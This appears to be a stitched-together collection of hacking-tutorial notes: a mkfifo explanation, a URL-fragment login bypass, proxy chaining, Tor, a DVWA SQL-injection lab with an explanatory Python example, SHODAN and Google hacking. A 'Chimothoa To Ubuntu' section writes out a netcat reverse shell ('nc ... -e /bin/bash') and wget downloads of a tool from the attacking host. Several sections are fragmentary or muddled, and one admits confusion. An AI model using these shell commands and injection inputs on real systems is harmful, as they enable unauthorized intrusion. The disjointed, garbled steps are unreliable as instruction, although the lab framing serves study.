INFORMATION GATHERING

https://docs.google.com/leaf?id=0B-KNbh5PxtuaMDI2ODQ4M2EtMmRhZC00MWEzLTgyYWItYTM2MzdlZTc5ODE5&hl=en_US

MKFIFO

The mkfifo function can be used to create a named pipe from within a program. Its signature is as follows:

int mkfifo(const char *path, mode_t mode)

The mkfifo function takes the path of the file and the mode (permissions) with which the file should be created. It creates the new named pipe file at the location given by path.
The call behaves as if the O_CREAT|O_EXCL flags were set: it creates a new named pipe, or fails with the error EEXIST if the named pipe already exists. The named pipe's owner ID is set to the process' effective user ID, and its group ID is set to the process' effective group ID, or, if the S_ISGID bit is set in the parent directory, the group ID of the named pipe is inherited from the parent directory.
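
The behaviour described above, as an added example that is not part of the original page. It uses Python's os.mkfifo, which wraps the same call, and shows the EEXIST case and the owner and mode checks; the function name and file names are hypothetical.

```python
import os
import stat
import tempfile

def make_private_fifo(path):
    """Create a FIFO readable and writable by its owner only.

    Returns "created" for a new FIFO and "reused" when a FIFO we own with
    owner-only permissions is already there; raises RuntimeError otherwise.
    """
    old_umask = os.umask(0o077)      # the mode argument is filtered by umask
    try:
        os.mkfifo(path, 0o600)       # fails instead of replacing an existing file
        return "created"
    except FileExistsError:          # errno EEXIST
        st = os.lstat(path)          # lstat: inspect the entry, not a symlink target
        if not stat.S_ISFIFO(st.st_mode):
            raise RuntimeError(f"{path} exists and is not a FIFO")
        if st.st_uid != os.geteuid() or stat.S_IMODE(st.st_mode) & 0o077:
            raise RuntimeError(f"{path} is not a private FIFO owned by us")
        return "reused"
    finally:
        os.umask(old_umask)

def demo():
    """Exercise the function in a throwaway directory (constructed paths)."""
    results = []
    with tempfile.TemporaryDirectory() as d:
        pipe = os.path.join(d, "app.fifo")
        results.append(make_private_fifo(pipe))        # new pipe
        results.append(make_private_fifo(pipe))        # EEXIST, then verified
        st = os.lstat(pipe)
        results.append(st.st_uid == os.geteuid())      # owner is the effective UID
        results.append(oct(stat.S_IMODE(st.st_mode)))  # permissions as created
        regular = os.path.join(d, "not-a-pipe")
        open(regular, "w").close()                     # a regular file in the way
        try:
            make_private_fifo(regular)
        except RuntimeError:
            results.append("rejected")
    return results

if __name__ == "__main__":
    print(demo())
```

Treating EEXIST as success without the lstat checks would let the program open whatever another user placed at that path.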

ByPass FBIP

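First, enter localhost/fbip in the browser.

The URL shows that we are then redirected to the login page:
http://localhost/fbip/Process/proses_login.php
Now we enter # before proses_login.php:
http://localhost/fbip/Process/#proses_login.php
Everything after # is a URL fragment, which the browser does not send to the server, so the request goes to /fbip/Process/ rather than to the login script.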


"Good Luck"

ABOUT PROXY CHAIN

Proxy chaining is simply connecting through more than one proxy before reaching your intended destination. You can use as many proxy servers as you can or want. The more you have, the more anonymous you will be.
With proxy chaining, your traffic flows like this:
your computer => proxy1 => proxy2 => ... => proxy X => web-site
When you use proxy chaining software, you in effect create one "virtual proxy". To use the chain proxy1 => proxy2 => ... => proxy X, you connect to the address of that "virtual proxy", which you learn when you set up your chain of proxies.
Summary: a proxy chain is a way of using several (2, 3, 10, etc.) proxy servers as if they were one proxy server.
Remember: it doesn't matter how many proxies you chain together, you will never be 100% anonymous.

"ABOUT TOR"

What is TOR...?

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.

Individuals use Tor to keep websites from tracking them and their family members, or to connect to news sites, instant messaging services, or the like when these are blocked by their local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site. Individuals also use Tor for socially sensitive communication: chat rooms and web forums for rape and abuse survivors, or people with illnesses.

Why we need Tor

Using Tor protects you against a common form of Internet surveillance known as "traffic analysis." Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic allows others to track your behavior and interests. This can impact your checkbook if, for example, an e-commerce site uses price discrimination based on your country or institution of origin. It can even threaten your job and physical safety by revealing who and where you are. For example, if you're travelling abroad and you connect to your employer's computers to check or send mail, you can inadvertently reveal your national origin and professional affiliation to anyone observing the network, even if the connection is encrypted.

How does traffic analysis work? Internet data packets have two parts: a data payload and a header used for routing. The data payload is whatever is being sent, whether that's an email message, a web page, or an audio file. Even if you encrypt the data payload of your communications, traffic analysis still reveals a great deal about what you're doing and, possibly, what you're saying. That's because it focuses on the header, which discloses source, destination, size, timing, and so on.

A basic problem for the privacy minded is that the recipient of your communications can see that you sent it by looking at headers. So can authorized intermediaries like Internet service providers, and sometimes unauthorized intermediaries as well. A very simple form of traffic analysis might involve sitting somewhere between sender and recipient on the network, looking at headers.

EXPLOIT DVWA WITH SQL INJECTION

Start Apache and start MySQL.

Open DVWA.

Log in with user name and password, and set the DVWA security level to low.

Select SQL Injection.

And type 'or' 1= 1--

And next I'm confused.
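
What that input does to a query built by string concatenation, next to the parameterized form that fixes it, as an added example that is not DVWA's code. An in-memory SQLite database stands in for the application's MySQL database; the table, column and user names are constructed.

```python
import sqlite3

PAGE_INPUT = "'or' 1= 1--"   # the string typed into the form above

def make_db():
    """In-memory stand-in for the application's user table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("1", "alice"), ("2", "bob"), ("3", "carol")])
    return db

def lookup_concatenated(db, user_id):
    """Vulnerable pattern: the input becomes part of the SQL text."""
    sql = "SELECT first_name FROM users WHERE user_id = '" + user_id + "'"
    return sql, [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, user_id):
    """Hardened pattern: the input is bound as a value and never parsed as SQL."""
    sql = "SELECT first_name FROM users WHERE user_id = ?"
    return sql, [row[0] for row in db.execute(sql, (user_id,))]

def demo():
    db = make_db()
    out = {}
    for label, value in (("normal id", "2"), ("page input", PAGE_INPUT)):
        out[label] = {
            "concatenated": lookup_concatenated(db, value),
            "parameterized": lookup_parameterized(db, value),
        }
    return out

if __name__ == "__main__":
    for label, result in demo().items():
        print(label)
        for kind, (sql, rows) in result.items():
            print(f"  {kind:14} {sql}")
            print(f"  {'':14} -> {rows}")
```

In the concatenated query the first quote of the input closes the string literal, so the WHERE clause reads `user_id = '' or ' 1= 1--'`; the second operand evaluates as true and every row comes back. The parameterized query compares user_id with the whole input as one value and returns nothing.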

Chimothoa To Ubuntu Part 11

Ok Guys

First, open Ubuntu, open a terminal and type the command nc 192.168.43.1 098 -e /bin/bash

Next, on BackTrack, type the command nc -l -v -p 098

root@bt:~# nc -l -v -p 098
listening on [any] 98 ...
192.168.43.129: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.43.1] from (UNKNOWN) [192.168.43.129] 54044

#ls

(ls typed here runs on the Ubuntu machine)

Then type the commands #wget 192.168.43.1/nc, next #wget 192.168.43.101, #ls, #chmod, #ls -lia nc

Then, on BackTrack, type the command #nc 192.168.43.101 098, and #ls

" ABOUT SHODAN"

SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.

Web search engines, such as Google and Bing, are great for finding websites. But what if you're interested in finding computers running a certain piece of software (such as Apache)? Or if you want to know which version of Microsoft IIS is the most popular? Or you want to see how many anonymous FTP servers there are? Maybe a new vulnerability came out and you want to see how many hosts it could infect? Traditional web search engines don't let you answer those questions.

So what does SHODAN index then? Good question. The bulk of the data is taken from 'banners', which are meta-data the server sends back to the client. This can be information about the server software, what options the service supports, a welcome message or anything else that the client would like to know before interacting with the server. For example, the following is an FTP banner:

220 kcg.cz FTP server (Version 6.00LS) ready. 

This tells us a potential name of the server (kcg.cz), the type of FTP server (Solaris ftpd) and its version (6.00LS). For HTTP a banner looks like: 


HTTP/1.0 200 OK
Date: Tue, 16 Feb 2010 10:03:04 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
Last-Modified: Wed, 01 Jul 1998 08:51:04 GMT
ETag: "135074-61-3599f878"
Accept-Ranges: bytes
Content-Length: 97
Content-Type: text/html 
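
To see exactly what the two banners above disclose, the following added example (not SHODAN's code and not part of the original page) parses them into software names and versions, which is a quick way to audit what your own services announce. The function names are hypothetical, and the FTP pattern assumes a greeting worded like the one shown.

```python
import re

# Both banners are copied from the page above.
FTP_BANNER = "220 kcg.cz FTP server (Version 6.00LS) ready."
HTTP_BANNER = """\
HTTP/1.0 200 OK
Date: Tue, 16 Feb 2010 10:03:04 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
Last-Modified: Wed, 01 Jul 1998 08:51:04 GMT
ETag: "135074-61-3599f878"
Accept-Ranges: bytes
Content-Length: 97
Content-Type: text/html
"""

# name/version tokens such as Apache/1.3.26; comments like "(Unix)" are skipped
PRODUCT = re.compile(r"([A-Za-z][\w.-]*)/(\d[\w.-]*)")

def parse_http_banner(banner):
    """Return the status code, the headers and the name/version pairs in Server."""
    lines = banner.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    software = PRODUCT.findall(headers.get("server", ""))
    return {"status": status, "headers": headers, "software": software}

def parse_ftp_banner(banner):
    """Split an FTP greeting of the shape shown on the page into its parts."""
    m = re.match(r"(\d{3})[ -](\S+) FTP server \(Version ([^)]+)\)", banner)
    if m is None:            # other servers word their greeting differently
        return None
    return {"code": int(m.group(1)), "host": m.group(2), "version": m.group(3)}

def disclosed_versions(banner):
    """List every version string a banner gives away, HTTP or FTP."""
    if banner.startswith("HTTP/"):
        return [f"{n} {v}" for n, v in parse_http_banner(banner)["software"]]
    ftp = parse_ftp_banner(banner)
    return [f"FTP server {ftp['version']}"] if ftp else []

if __name__ == "__main__":
    print(disclosed_versions(FTP_BANNER))
    print(disclosed_versions(HTTP_BANNER))
```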


The Basics

Now that you know what a banner is, you can start searching for computers that match your interests. First, let's take a look at the user interface:


  1. Search input box: where all the magic happens
  2. Country map: click on a country to only see computers from there in the results
  3. Service filter: decide which services should be searched
  4. Options bar: click on it to see the above filters

The interface should be familiar to anybody who's used search engines before. Onwards to actually using SHODAN!
To get things started, search for computers that contain 'Apache' in their banner: Apache

  1. Search input: the query we used for searching, in this case 'apache'.
  2. Save: store useful search queries.
  3. Export: export up to 1,000 results in XML format.
  4. Result info: shows how many total hosts were found for the query.
  5. Country breakdown: highlights the countries that had the most matches for your query.
  6. Left side of results: contains the IP, operating system, date when it was added and the country the computer is in. If there's domain information available then that is shown as well.
  7. Right side of results: shows the banner with the search term(s) highlighted.

Now that you know the basics of searching on SHODAN, it's time to move on and check out the various filters you can use to narrow down your search results.

"GOOGLE HACKING"

Google hacking

What is Google hacking?
Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling your site and launching the Google Hacking Database queries directly onto the crawled content.

What a hacker can do if your site is vulnerable
Information that the Google Hacking Database identifies:

  •     Advisories and server vulnerabilities
  •     Error messages that contain too much information
  •     Files containing passwords
  •     Sensitive directories
  •     Pages containing logon portals
  •     Pages containing network or vulnerability data such as firewall logs.

How to check for Google hacking vulnerabilities
The easiest way to check whether your web site and applications have Google hacking vulnerabilities is to use a Web Vulnerability Scanner. A Web Vulnerability Scanner scans your entire website and automatically checks for pages that are identified by Google hacking queries. (Note: Your web vulnerability scanner must be able to launch Google hacking queries.)